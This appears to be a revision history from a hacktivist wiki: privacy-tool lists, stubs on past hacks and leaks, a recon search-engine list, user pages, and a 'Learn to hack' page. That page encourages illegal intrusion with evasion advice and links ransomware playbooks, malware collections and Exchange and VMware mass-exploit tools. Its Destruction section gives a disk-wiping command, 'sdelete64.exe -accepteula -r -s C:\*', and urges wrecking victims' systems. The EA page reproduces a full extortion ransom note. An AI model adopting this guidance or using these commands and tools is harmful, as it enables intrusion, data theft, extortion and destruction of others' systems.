* [https://cwtch.im Cwtch] Surveillance resistant infrastructure. ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])
* [https://getsession.org/ Session Messenger] Send messages, not metadata.
* [https://www.thunderbird.net Thunderbird] A e-mail client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption].
* Probably the most mature XMPP client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])

== Operating Systems ==
* [https://www.qubes-os.org/ Qubes OS] A reasonably secure operating system.
* [https://www.whonix.org/ Whonix] Superior Internet Privacy.
* [https://tails.net Tails] a portable operating system that protects against surveillance and censorship.

== E-mail Services ==
* [https://disroot.org/en Disroot] Disroot is a platform providing online services based on principles of freedom, privacy, federation and decentralization.
* [https://riseup.net/en/email Riseup] E-mail invite only.
* [https://proton.me/mail Protonmail] Secure E-mail that protects your privacy.
* [https://tuta.com/ Tuta] Secure, green and ad-free. E-mail to feel good about.

== Guides ==
* [https://anonymousplanet.org/ The Hitchhiker’s Guide to Online Anonymity] | [http://thgtoa27ujspeqxasrfvcf5aozqdczvgmwgorrmblh6jn4nino3spcqd.onion/ Tor].
* [https://www.anarsec.guide/ Anarsec] Tech Guides for Anarchists.
* [https://www.eff.org/pages/surveillance-self-defense Surveillance Self-Defense].
* [https://privacy.awiki.org/ The Privacy Raccoon] Digital self-defense against mass surveillance.
* [https://www.whonix.org/wiki/Tips_on_Remaining_Anonymous Tips on Remaining Anonymous] Whonix Wiki.

* [https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/grey-privacy-tor-opsec s0cm0nkey's Security Reference Guide].

AntiSec

2023-11-27T08:05:00Z

Mxwgn: mini improviment

AntiSec was an offshoot of Anonymous with the self-declared goal of stealing and leaking any classified government information, including e-mail spools and documentation. Their prime targets were banks and other high-ranking establishments.

AntiSec was eventually taken down by law enforcement, largely due to the informant Sabu.

Communiques via defacements:
* https://www.zone-h.org/mirror/id/14841451
* https://www.zone-h.org/mirror/id/16969108
* https://www.zone-h.org/mirror/id/17107967
* https://www.zone-h.org/mirror/id/16859089
* https://www.zone-h.org/mirror/id/16859533
* https://www.zone-h.org/mirror/id/16983974
* https://www.zone-h.org/mirror/id/16983975
* https://www.zone-h.org/mirror/id/16824726

== Files ==
[[File:Operation_Anti-Security.txt]]

[[Category:Hackers]]
[[Category:Stub pages]]

MagaCoin

2023-11-27T08:03:24Z

Mxwgn:

Hack of a website associated with MagaCoin, exposing the e-mail addresses, passwords, wallet addresses and IP addresses of early investors in the "mineable cryptocoin created with Conservatives in mind."

[https://www.theguardian.com/technology/2021/jul/22/magacoin-pro-trump-cryptocurrency-attracts-over-1000-people-to-sign-up Revealed: the people who signed up to the Magacoin Trump cryptocurrency] (The Guardian)

[[Category:Hacks]]

Search Engines Resources

2023-11-27T08:02:48Z

Mxwgn:

== Search Engines ==
The following search engines can be used as part of your passive recon. They are good for searching through code repositories, passive port scanning and technology analysis and looking for CVEs and exploits. To make use of their fullest potential they often require payments. Remember to conduct good OPSEC when placing any purchases with services that you're going to use in your hacktivist operations!

Many of these search engines allow the use of an API. You can integrate their API's with some of your automated tooling.

=== Web ===
* https://www.google.com
* https://duckduckgo.com
* https://www.bing.com
* https://yandex.com
* https://metager.de/
* https://searxng.nicfab.eu/
* https://search.carrot2.org/#/search/web
* https://github.com
** https://github.com/gwen001/github-subdomains
*** https://github.com/gwen001/github-endpoints
**** https://github.com/gwen001/github-regexp

=== Code repository search ===
* https://grep.app
* https://searchcode.com

=== Exploit/CVE search ===
* https://www.exploit-db.com
* https://www.rapid7.com/db
* https://sploitus.com
* https://www.exploitalert.com/search-results.html
* https://vulmon.com
* https://www.cisa.gov/known-exploited-vulnerabilities-catalog
* https://vulners.com [Free & Paid]
* Nuclei template search engine: https://nuclei-templates.netlify.app

=== Internet of things search ===
* https://www.shodan.io [Free & Paid]
* https://www.zoomeye.org [Free & Paid]
* https://search.censys.io [Free & Paid]
* https://dnsdumpster.com
* https://urlscan.io [Free & Paid]
* https://ivre.rocks
* https://fullhunt.io [Free & Paid]
* https://pulsedive.com [Free & Paid]
* https://wigle.net
* https://crt.sh
* https://publicwww.com [Free & Paid]
* https://viz.greynoise.io [Free & Paid]
* https://tls.bufferover.run [Free & Paid]
* https://www.whois.com/whois
* Passively enumerate subdomains: https://subdomainfinder.c99.nl
* https://host.io [Free & Paid]
* https://viewdns.info
* https://hackertarget.com [Free & Paid]
* Internet analysis: https://bgp.he.net
* https://check-host.net
* https://whois.whoisxmlapi.com [Free & Paid]
* https://www.whoxy.com [Free & Paid]
* https://viewdns.info

=== Business e-mail search ===
* https://hunter.io [Paid]
* https://rocketreach.co [Paid]

User:Mxwgn

2023-11-27T07:59:10Z

Mxwgn:

Hello.

e-mail: maxwell@disroot.org
fediverse: nixnet.social/maxwl

WebDetetive

2023-11-16T23:06:16Z

Mxwgn:

150,000 files from the spyware reseller WebDetetive, a phone monitoring app typically installed on phones without the user's consent (or even knowledge). The software uploads the contents of the user's phone to its servers, messages, call logs, phone call recordings, photos, ambient recordings from the phone’s microphone and GPS data.

The data does not include include files from the victims' devices. WebDetetive does not verify customer email addresses when signing up.

== Media Coverage ==
# https://ddosecrets.com/wiki/WebDetetive
# https://techcrunch.com/2023/08/26/brazil-webdetetive-spyware-deleted/

Search Engines Resources

2023-11-16T23:04:26Z

Mxwgn: /* Web */

== Search Engines ==
The following search engines can be used as part of your passive recon. They are good for searching through code repositories, passive port scanning and technology analysis and looking for CVEs and exploits. To make use of their fullest potential they often require payments. Remember to conduct good OPSEC when placing any purchases with services that you're going to use in your hacktivist operations!

Many of these search engines allow the use of an API. You can integrate their API's with some of your automated tooling.

=== Web ===
* https://www.google.com
* https://duckduckgo.com
* https://www.bing.com
* https://yandex.com
* https://metager.de/
* https://searxng.nicfab.eu/
* https://search.carrot2.org/#/search/web
* https://github.com
** https://github.com/gwen001/github-subdomains
*** https://github.com/gwen001/github-endpoints
**** https://github.com/gwen001/github-regexp

=== Code repository search ===
* https://grep.app
* https://searchcode.com

=== Exploit/CVE search ===
* https://www.exploit-db.com
* https://www.rapid7.com/db
* https://sploitus.com
* https://www.exploitalert.com/search-results.html
* https://vulmon.com
* https://www.cisa.gov/known-exploited-vulnerabilities-catalog
* https://vulners.com [Free & Paid]
* Nuclei template search engine: https://nuclei-templates.netlify.app

=== Internet of things search ===
* https://www.shodan.io [Free & Paid]
* https://www.zoomeye.org [Free & Paid]
* https://search.censys.io [Free & Paid]
* https://dnsdumpster.com
* https://urlscan.io [Free & Paid]
* https://ivre.rocks
* https://fullhunt.io [Free & Paid]
* https://pulsedive.com [Free & Paid]
* https://wigle.net
* https://crt.sh
* https://publicwww.com [Free & Paid]
* https://viz.greynoise.io [Free & Paid]
* https://tls.bufferover.run [Free & Paid]
* https://www.whois.com/whois
* Passively enumerate subdomains: https://subdomainfinder.c99.nl
* https://host.io [Free & Paid]
* https://viewdns.info
* https://hackertarget.com [Free & Paid]
* Internet analysis: https://bgp.he.net
* https://check-host.net
* https://whois.whoisxmlapi.com [Free & Paid]
* https://www.whoxy.com [Free & Paid]
* https://viewdns.info

=== Business email search ===
* https://hunter.io [Paid]
* https://rocketreach.co [Paid]

Secure Messaging Applications

2023-11-16T21:13:36Z

Mxwgn: updated

== Recommended Applications ==

* [https://element.io/ Element/Matrix] A secure communications platform built around you.
* [https://xmpp.org/ XMPP] The universal messaging standard.
* [https://onionshare.org Onionshare] Privacy + Productivity.
* [https://tox.chat/ Tox] A New Kind of Instant Messaging.
* [https://briarproject.org/ Briar] Secure messaging, anywhere.
* [https://signal.org/ Signal] Speak Freely.
* [https://cwtch.im Cwtch] Surveillance resistant infrastructure. ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])
* [https://getsession.org/ Session Messenger] Send messages, not metadata.
* [https://www.thunderbird.net Thunderbird] A e-mail client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption].
* Probably the most mature XMPP client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])

== Operating Systems ==
* [https://www.qubes-os.org/ Qubes OS] A reasonably secure operating system.
* [https://www.whonix.org/ Whonix] Superior Internet Privacy.
* [https://tails.net Tails] a portable operating system that protects against surveillance and censorship.

== E-mail Services ==
* [https://disroot.org/en Disroot] Disroot is a platform providing online services based on principles of freedom, privacy, federation and decentralization.
* [https://proton.me/mail Protonmail] Secure email that protects your privacy.
* [https://tuta.com/ Tuta] Secure, green and ad-free. Email to feel good about.

== Guides ==
* [https://anonymousplanet.org/ The Hitchhiker’s Guide to Online Anonymity] | [http://thgtoa27ujspeqxasrfvcf5aozqdczvgmwgorrmblh6jn4nino3spcqd.onion/ Tor].
* [https://privacy.awiki.org/ The Privacy Raccoon] Digital self-defense against mass surveillance.
* [https://www.whonix.org/wiki/Tips_on_Remaining_Anonymous Tips on Remaining Anonymous] Whonix Wiki.
* [https://www.eff.org/pages/surveillance-self-defense Surveillance Self-Defense] (EFF).
* [https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/grey-privacy-tor-opsec s0cm0nkey's Security Reference Guide].

CorruptBrazil

2023-11-16T20:57:17Z

Mxwgn: improviment

A cache of evidence revealing government coverup of a corruption investigation involving the CIA, the Brazilian telecom industry, and multiple US corporations.

== Files ==
[[File:CorruptBrazil_release-statement.txt]]

== Dataset/ddosecrets ==
* [https://www.ddosecrets.com/wiki/CorruptBrazil CorruptBrazil at Distributed Denial of Secrets]

[[Category:Hacks]] [[Category:Stub pages]]

Fuck FBI Friday

2023-11-16T20:53:38Z

Mxwgn: improviment

FFF (Fuck FBI Friday) was a series of hacks against the Federal Bureau of Investigation, law enforcement agencies, and contractors by Anonymous-affiliated group Lulzsec/Antisec.

== Files ==
[[File:Fuckfbifriday_teaser.txt]] 
[[File:NwN8ehFW.txt]] 
[[File:FFF_-_lcso.org_Edition.txt]] 
[[File:PRETENTIOUS_PRESS_STATEMENT.txt]] 
[[File:Antisec_Fuck_FBI_Friday_V_IACIS_Cybercrime_Investigators.txt]]

== Dataset/ddosecrets ==
[https://ddosecrets.com/wiki/Fuck_FBI_Friday Fuck FBI friday at Distributed Denial of Secrets]

[[Category:Hacks]] [[Category:Stub pages]]

Electronic Arts

2023-11-16T20:30:18Z

Mxwgn: minor fix

Hack of the video game company Electronics Arts exposing 780GB of data including source code for the company's Frostbite engine, by LAPSUS$.

[https://www.vice.com/en/article/wx5xpx/hackers-steal-data-electronic-arts-ea-fifa-source-code Vice: Hackers Steal Wealth of Data from Game Giant EA]

== Explanation of the Hack ==

The hackers bought a cookie that let them log into an EA Slack account on Genesis Market, a marketplace for credentials stolen from computers infected with malware. The hackers then tricked an IT employee into granting them access to the company's internal network.

* [https://www.vice.com/en/article/7kvkqb/how-ea-games-was-hacked-slack Vice: How Hackers Used Slack to Break into EA Games]
* [https://www.vice.com/en/article/n7b3jm/genesis-market-buy-cookies-slack Vice: Inside the Market for Cookies That Lets Hackers Pretend to Be You]

The hackers first tried to sell the access and source code on Raidforums. The Raidforums members got the hackers in touch with a Vice journalist who interviewed them and broke news of the hack to EA. The hackers then tried to solicit said journalist to pass along an extortion message to EA. Unfortunately, the journalist refused. The hackers proceeded to blackmail the company for $100m not to release the data and Vice was then able to confirm that EA had indeed received their message. EA does not seem to have paid as the hackers have subsequently released all the data for free.

[https://www.vice.com/en/article/m7e57n/hackers-extort-ea-fifa Vice: Hackers Move to Extort Gaming Giant EA]

== Ransom note ==

<pre>
Hello EA

we are the Hackers who breached your src and other data
First of all we apologize to harm your company and reputation
well what is the motive behind any hack Money right ?
so we are here to discuss related to this thing
we checked your statement on media where you mentioned ""No player data was accessed, and we have no reason to believe there is any risk to player privacy,
Is this really true? We, in fact, got to some of your production database we have database (around 2TB of pure data)
As you already know
we have src , tools + unrevealed 2tb pure data
with respect you also know if we leak this it can be big trouble for your company
that's why i have a idea best offer to you
we never sell your data to anyone
only my team have this data if we want to kept his all private we can
the deal is Pay us 100 mil$ in xmr (monero)
we will never disclose your any type of data in public even we take full responsibility it will never leak and it will deleted from our system too
You have 7 days for paying us first 33.34 mil$ to the first address
After 8 th day we will contact news to tell them we have user data.
After the 9th day we will start to post some part of your source code every day on the deepweb til the first payment is completed.
we gave you the best offer if you pay in delay, everything will be deleted and your company can run,

We have no interest in leaking if you pay. I know this sound like a ransomware, but just for one time, trust us. We just want money

we know your are afraid of scammers
we sending you here our proof ofdata for your trust

So, how's that we gonna proceed,
You will maintenance your fifa 21 servers the 5th of july at any time,
Before the maintenance, you will post a message on your twitter account (@EA)
After the first payment completed, you will have 2weeks to send the other 66.66mil USD

Data : USER_EVENT_SESSION_ENGA... Rows : 348.0G Size : 30.3TB
USER_EVENT_ECONOMY Rows : 108.5G Size : 11.4TB
USER_EVENT_MESSAGING Rows : 190.9G Size : 11.2TB

I really hope you understand that we are not kidding and we are friendly.
Thoses addresses are one time payment, mean you can't send two time to an address.

so here is out payment address

XMR :

again we are sorry but you know during this pandemic we all need money , just all people ways are different

i hope you will send the first payment in less than 7 days so we can continue

Instruction : Well for our own reasons we don't use any direct contact with you

we will use indirect contact method
So, I will give you some written content which you will post from your Twitter account so that we can understand.
if you are ready and make payment with the address
post on your twitter account : "maintenance from 5 July 10 to 11 UTC

If you posted this we will understand you are ready to make the payment and we will proceed

In Case you want to deny our golden offer
post :
or if you need some more time post "just report this to any reporter and made news again we so we understand you deny our offer and we will start to posting our code and start selling other sensitive data"

in one line : if you agree do a maintenance 5th of july from 10 to 11 UTC AND POST ON TWITTER
We need 33.34 mil in this week after this We will recontact you in some times

When the first payment will be completed we will delete 50% of what we have

On the third payment we will delete the database from our servers

You will have 2 weeks to pay the others payment

33.34 mil in this week after this We will recontact you in some times

When the first payment will be completed we will delete 50% of what we have

On the third payment we will delete the database from our servers

You will have 2 weeks to pay the others payment
hope you will understand and pay us as fast as you can

Last thing
If possible, do not tell this to the reporter and LE shits because we also do not want your reputation and worth to be down.
</pre>

[[Category:Hacks]]

Secure Messaging Applications

2023-11-16T20:25:53Z

Mxwgn: updated list

== Recommended Applications ==

* [https://tails.net Tails] comes with onionshare for file sharing, pidgin with OTR for encrypted chat, and thunderbird with GPG for encrypted email.
* [https://onionshare.org Onionshare] Privacy + Productivity.
* [https://element.io/ Element/Matrix] A secure communications platform built around you.
* [https://tox.chat/ Tox] A New Kind of Instant Messaging.
* [https://briarproject.org/ Briar] Secure messaging, anywhere.
* [https://signal.org/ Signal] Speak Freely.
* [https://cwtch.im Cwtch] Surveillance resistant infrastructure. ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])
* [https://getsession.org/ Session Messenger] Send messages, not metadata.
* [https://www.thunderbird.net Thunderbird] A e-mail client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption].
* Probably the most mature XMPP client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])

For a more detailed comparison of secure messaging software, see [https://www.whonix.org/wiki/Chat the Whonix Wiki].

Secure Messaging Applications

2023-11-16T20:14:53Z

Mxwgn: minor improviments

== Recommended Applications ==

* [https://tails.net Tails] comes with onionshare for file sharing, pidgin with OTR for encrypted chat, and thunderbird with GPG for encrypted email
* Probably the most mature XMPP client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])
* https://cwtch.im ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])
* https://onionshare.org ([http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion Tor])
* https://www.thunderbird.net A e-mail client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption]

For a more detailed comparison of secure messaging software, see [https://www.whonix.org/wiki/Chat the Whonix Wiki].

User:Mxwgn

2023-11-16T20:11:22Z

Mxwgn:

Hello.

E-MAIL: maxwell@disroot.org
-
FEDIVERSE: @maxwl@mastodon.social

Learn to hack

2023-11-16T19:49:25Z

Mxwgn: minor improviments

This page aims to compile high quality resources for hackers for both the experienced and inexperienced. All books listed on this page can be [https://libgen.lc found] on [https://libgen.fun/ Library Genesis].

Make sure that you follow good OPSEC when carrying out your operations! See [https://enlacehacktivista.org/index.php?title=Learn_to_hack#Operational_security OPSEC]

== General Resources ==

Resources that assume little to no background knowledge:
* https://www.hoppersroppers.org/training.html
* https://tryhackme.com/

Resources that assume minimal tech background:
* (book) Penetration Testing: A Hands-On Introduction to Hacking
* [https://web.archive.org/web/20230531145531/https://papers.vx-underground.org/papers/Malware%20Defense/Malware%20Analysis%202021/2021-08-31%20-%20Bassterlord%20%28FishEye%29%20Networking%20Manual%20%28X%29.pdf Bassterlord Networking Manual (translated)] (Focuses on [https://enlacehacktivista.org/index.php?title=Fortinet_SSL_VPN_Path_Traversal exploiting and hacking into networks via Forti SSL VPN])
* [https://web.archive.org/web/20230531144434if_/https://cdn-151.anonfiles.com/vcD868ubz5/08a9b897-1685544763/BasterLord+-+Network+manual+v2.0.pdf Bassterlord Networking Manual v2.0 (translated)] (Focuses on [[VPN brute forcing]])
* Translated: [https://web.archive.org/web/20230404175503if_/https://cdn-150.anonfiles.com/satbX2i8z2/75a3be58-1680631481/Conti_playbook_translated.pdf Conti playbook]
* LockBit 3.0 CobaltStrike: [https://web.archive.org/web/20230701141731if_/https://cdn-147.anonfiles.com/s1cbD0z3z3/4536e4f8-1688221595/LockBit-CobaltStrike.pdf LockBit 3.0 Guide]

Resources that assume a tech or hacking background:
* (book) The Hacker Playbook 3
* [[Hack Back! A DIY Guide]]
* https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak
* [https://enlacehacktivista.org/images/8/8f/Flexispy.txt Flexispy Hack Back]
* [https://enlacehacktivista.org/libertycounsel.txt Liberty Counsel Hack Back]
* [https://youtu.be/kCLDqvDnGzA Catalan Police Union Hack Back]
* https://book.hacktricks.xyz
* [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Pronico Hack Back]
* https://github.com/Correia-jpv/fucking-the-book-of-secret-knowledge
* https://github.com/0xPugazh/One-Liners

The Bug Hunters Methodology:
* https://github.com/jhaddix/tbhm
* Application Analysis: https://youtu.be/FqnSAa2KmBI
* The Bug Hunter's Methodology v4.0: https://youtu.be/p4JgIu1mceI?si=jXcYksd4UqodZDBF
Practice labs:
* https://www.hackthebox.com
* https://academy.hackthebox.com
* https://www.pentesteracademy.com
* https://lab.pentestit.ru
* https://overthewire.org/wargames

Appsec:
* https://github.com/paragonie/awesome-appsec

Malware, a collection of malware source code and binaries:
* https://github.com/vxunderground/MalwareSourceCode
* https://github.com/ytisf/theZoo/tree/master/malware

=== General references ===

General resources you may find useful for learning.

See [[General References]]

[https://owasp.org/www-project-top-ten/ OWASP Top 10] is a broad consensus about the most critical security risks to web applications. See TryHackMe's [https://tryhackme.com/room/owasptop10 room] for practical OWASP Top 10 learning and their [https://tryhackme.com/room/owaspjuiceshop Juice Shop].

== Recommended Reading - The Library ==
See recommended reading [https://libgen.fun books] that will aid you in your learning. See [[recommended reading in the library]]

* [https://theanarchistlibrary.org/special/index The Anarchist Library] ([http://libraryqxxiqakubqv3dc2bend2koqsndbwox2johfywcatxie26bsad.onion/special/index Tor])
* Phrack: http://phrack.org

== Operational security ==

Operational security (OPSEC) is crucial for protecting oneself from surveillance and maintaining anonymity while conducting hacktivist operations.

=== Recommended Measures ===

Any illegal hacktivity should be done from an encrypted and separate computer or virtual machine, with all traffic router over Tor.

For more information on recommended operational security measures, see [[Opsec Measures]]

=== Secure Messaging ===

Best practice for secure messaging includes proxying connections over Tor and using end-to-end encryption for messages.

==== Recommended Applications ====

For Jabber/XMPP, make sure to enable OTR or OMEMO encryption. For e-mail use PGP for encryption. For file sharing use onionshare.

For more information on recommended applications, see [[Secure Messaging Applications]]

== Initial Access ==

There are many ways to gain [https://attack.mitre.org/tactics/TA0001/ initial access] into a targets network, from phishing, buying credential access, buying infected machines in corporate networks, password spraying, performing a targeted [https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets penetration test] and spray and pray scanning for vulnerabilities and hacking in. Here we list some resources in these regards.

=== Common Initial Access TTPs ===

For more information on gaining a foothold, see [[Initial Access Tactics, techniques and procedures]]

=== Attacking Common Services ===
Your targets will likely use many services either externally or internally, this could be SSH, RDP, SMB, etc. It's important to know their common misconfigurations, attack vectors, their attack surface and how to hack these various protocols which may serve as the initial access vector. Here we cover various tools, techniques, common misconfigurations, tips and tricks and we cover both internal and external (publicly accessible) networks.

See [[Common Service Attacks]]

=== Scanning and Recon ===

For [https://attack.mitre.org/tactics/TA0043 scanning and recon] tools, see [[Scanning and Recon]]. Make sure to make use of your tool's documentation and read the help menu (-hh/-h/--help).

=== Search Engines ===

Search engines are a useful tool for gathering information and intelligence from publicly available sources. Some are paid and some are free. Make sure to operate good OPSEC whenever placing a purchase for any service that will be used in your recon on a target.

For more information on recommended search engines, see [[Search Engines Resources]]

=== OSINT ===

Open-source intelligence (OSINT) refers to the collection and analysis of information from publicly available sources.

For more information on recommended tools and resources, see [[OSINT Tools and Resources]]

== Persistence ==
Once you've found a weakness in your targets infrastructure and have been able to gain [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures initial access] you'll want to keep it and avoid detection to maintain your access to your targets network for as long as possible.

See [[Persistence]].

== Post exploitation ==

=== Windows ===
For Windows post exploitation, Active Directory and networking hacking, Lateral movement techniques, privilege escalation, defensive and offensive techniques:

See [[Hacking Windows]]

=== Linux ===
For performing Linux post exploitation, gaining persistence, evading detection, privilege escalation and more:

See [[Hacking Linux]]

== Exfiltration ==
One of the main objectives for a hacktivist is that of exfiltrating data, company secrets and if your motivations is that of revealing corruption then this step is of the most importance.

See [[Data Exfiltration]] for techniques and methods for exfiltrating data out of your targets network.

== Destruction ==
There may be times during a hacktivist operation when you come to the end of your hack, you've fully compromised your target, exfiltrated everything you can/want and now before finally leaving the network and leaking all the targets secrets online you want to cause chaos and destruction. [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T As was seen by Guacamaya] where they used <code>sdelete64.exe -accepteula -r -s C:\*</code> to wipe systems attached to Pronicos domain you might also want to do the same for Linux and Windows systems in your operations, maybe you want to recursively print a text file with your manifesto across a system/network, encrypt files beyond recovery or just delete everything.

See [[Chaos and Destruction]] for different ways to achieve this!

== Hacking Misc ==

=== Web Application Hacking ===

See [[Hacking Web Applications]]

=== API Hacking ===
Application Programming Interfaces (APIs) are the plumbing of today’s financial services and FinTech infrastructure, enabling FinTechs to embed banking into their apps and banks to offer a more unified experience to their customers demanding more from their bank ([https://web.archive.org/web/20230713230449if_/https://cdn-153.anonfiles.com/a5Q8c02azf/b80f3b8b-1689290042/Scorched-Earth-Whitepaper.pdf Knight]). [https://owasp.org/www-project-api-security APIs can be exploited] to aid in data exfiltration and taking advantage of an existing service.

See [[Hacking APIs]]!

=== IoT Hacking ===
* https://github.com/V33RU/IoTSecurity101

=== Hacking The Cloud ===
More and more of corporate networks are moving away from on-prem to in the cloud. Learning how to [https://hackingthe.cloud hack the cloud infrastructure] of your target is a valuable skill and as time progresses more and more networks will migrate towards the cloud.

See [[Cloud Hacking]]

=== Reverse Engineering ===
As was seen by [https://enlacehacktivista.org/index.php?title=Hack_Back!_A_DIY_Guide Phineas Fisher], highly motivated hacktivists who seek to hack their targets by any means necessary should consider 0-day research and exploit development, reverse engineering applications and services that their target may be running to gain an initial foothold and perform post exploitation.

See [[Reverse Engineering]]

== Product-specific Hacking ==

=== Google Workspace ===
https://www.slideshare.net/dafthack/ok-google-how-do-i-red-team-gsuite

=== VMware ===
* Exploiting vCenter to add vSphere user: https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md
* VMware Workspace ONE Access and Identity Manager RCE via SSTI. [https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis CVE-2022-22954:] Unauthenticated server-side template injection. [https://github.com/tunelko/CVE-2022-22954-PoC Mass Exploit]

=== Rocket.Chat ===
* Account hijacking and RCE as admin: [https://web.archive.org/web/20210805092939/https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy https://edbrsk.dev/content/real-cases/how-I-compromised-300-stores-and-a-spanish-consultancy]

=== Microsoft Exchange ===

ProxyLogon is dead. It's mitigated by Defender. ProxyShell is not. AMSI catches unmodified public exploits.

* ProxyShell: https://github.com/dmaasland/proxyshell-poc
* Improved proxyshell-poc: https://github.com/horizon3ai/proxyshell
* ProxyShell (webshell via New-MailboxExportRequest): https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/exchange_proxyshell_rce.md
* ProxyShell (webshell via New-ExchangeCertificate): https://gist.github.com/dmaasland/0720891aaf6dec8d3b42a5b92c8d6f94
* Polymorphic webshells: https://github.com/grCod/poly
* ProxyShell (no webshell, dump mailboxes via PowerShell): https://github.com/Jumbo-WJB/Exchange_SSRF
* Proxylogon, proxyshell, proxyoracle and proxytoken full chain exploit tool: https://github.com/FDlucifer/Proxy-Attackchain
* Automatic ProxyShell Exploit: https://github.com/Udyz/proxyshell-auto

User:Mxwgn

2023-11-16T19:42:31Z

Mxwgn:

Hello.

Contact:
FEDIVERSE: @maxwl@mastodon.social
XMPP: max@macaw.me

User:Mxwgn

2023-11-16T19:41:22Z

Mxwgn: i'm back.

Hello.

FEDIVERSE: @maxwl@mastodon.social
XMPP: max@macaw.me

User:Mxwgn

2023-08-16T23:54:32Z

Mxwgn: Replaced content with "<no-data>"

<no-data>

LulzSecPeru

2023-05-06T01:59:28Z

Mxwgn: remade page

LulzSecPeru is a Team of two Peruvian Hacktivists.

* Associated Press article in [https://apnews.com/article/a116da8dad8b4d9e8034a8556c87dbb0 english] and [https://apnews.com/article/archive-0fa4195c0171497f9090cc76381dc90d spanish]
* BBC News: https://www.bbc.co.uk/programmes/m0012plm
* Twitter: https://twitter.com/LulzSecPeru
* Phys: https://phys.org/news/2014-09-south-america-hackers-rattle-peru.html
* Quartz: https://qz.com/259444/latin-american-government-cronyism-as-told-through-emails-leaked-by-peruvian-hackers/

[[Category:Stub pages]]
[[Category:Hackers]]

User:Mxwgn

2023-05-06T00:54:19Z

Mxwgn:

Hello, i'm maxwell. a brazilian teen representating latin american people.
if you need to get in touch, write me an e-mail.

maxwell@disroot.org
my PGP key for encrypted messages -->

<nowiki>-----BEGIN PGP PUBLIC KEY BLOCK-----

xsDNBGRUlO8BDADCsmxWF0pVWlTISHBGosjSLf1ttRuwGUw9wbV8QNhJnic+civH
5Yv8wMfUQ6AXmsPAxinf9XjbQhA6zIqBUXiulVu24+iULx9frpGBogUzz1UtKADa
ij3IYMqEIGJiSUF/8Pi5en+A9IREph4fQliZUdXLDdVNEkyEAys43Bn9eCn/1H4C
RfwORCaM1ThXyV5dAAV5BOZNoBVzCO63WPpXdNKS4FIxPIAjYI4lIj9XG3NOUCw1
lXDL3SlBuc9rfPtn6cjh0O0MNC+TaU1XTwWFWZQXR/qLQKhjqyTVL4kdREkizIfC
siDzvgkpogeuWNcRajkV0ycBEr+5Qc2Tu71PS4kubzLmXdXdqcLjtctl/0s6cxC8
3nAx0O3JPhZ+sulPi+Dq/NleZJtznv0mDAmfL4UWJiwhlYb5HjSLOr50yRcvVMTr
kaYBaoU9zKgVxHlV3DJPC+IRDe4TjTp0RojPk0wSiAhViDOiB8SxKl+yy6Dyz45V
HqGA6u8tvvDGbCUAEQEAAc0dbWF4d2VsbCA8bWF4d2VsbEBkaXNyb290Lm9yZz7C
wQ0EEwEIADcWIQS0aN9pMNPmSF3bTmtVJAGLQ7HgpAUCZFSU8AUJEswDAAIbAwQL
CQgHBRUICQoLBRYCAwEAAAoJEFUkAYtDseCkaVcL/iLe8RV+dL9Z04r7yP53KbA8
hJy8U+SdLK9RrNJASuQ9Il4ZjXJnY02AcZl4szr5XxWwOQvJV0iwE8wO69I3MF1S
EzcjOVn1X36aK21vTrIZHXjVF6rVfV7op4ZHdA4OEdFYYe+C51Xe6jBhA3IMZRan
nuUsCGrpoad/O7FjHYpuaikzLMOxFhCFuEYHmEotYRKRN0xVoYWg/dX5EZL72XmV
CPqSvkw30WaK8P47dmlJPIFGAwP5nyNlBtBJTNS+ToK1Mitpt4e7EEGdGotIVCVL
zzkgA5fIREtkLB7LJs+RQ7N4A43GHDQx8Q9h3LBgpmW5vrjlKdei+Dwyd1LdDV8q
0kpgS7vSphUoxDi3EmvDOqTSjc8QA0Y9Igy8xCJDZ+Uvj1JayvnYyk2/5UgsJl8D
W/d8VoSgTyZxEDRg5E+MTuAQ7OalYWtQtDaQY1Ddgefqnzx5cqF6zLry/jG7jhJp
xgWbo8aohFevr0NgqU9l58FWmK9Tr5PHpxjb7HaEOs7AzQRkVJTwAQwA5CpI8o0s
xIeNKv5HsEmc2wpYAP7Pu+MsuxhpRhKGLpq66jSPgIM9hzoT5zVviLy0aLtW8Ol/
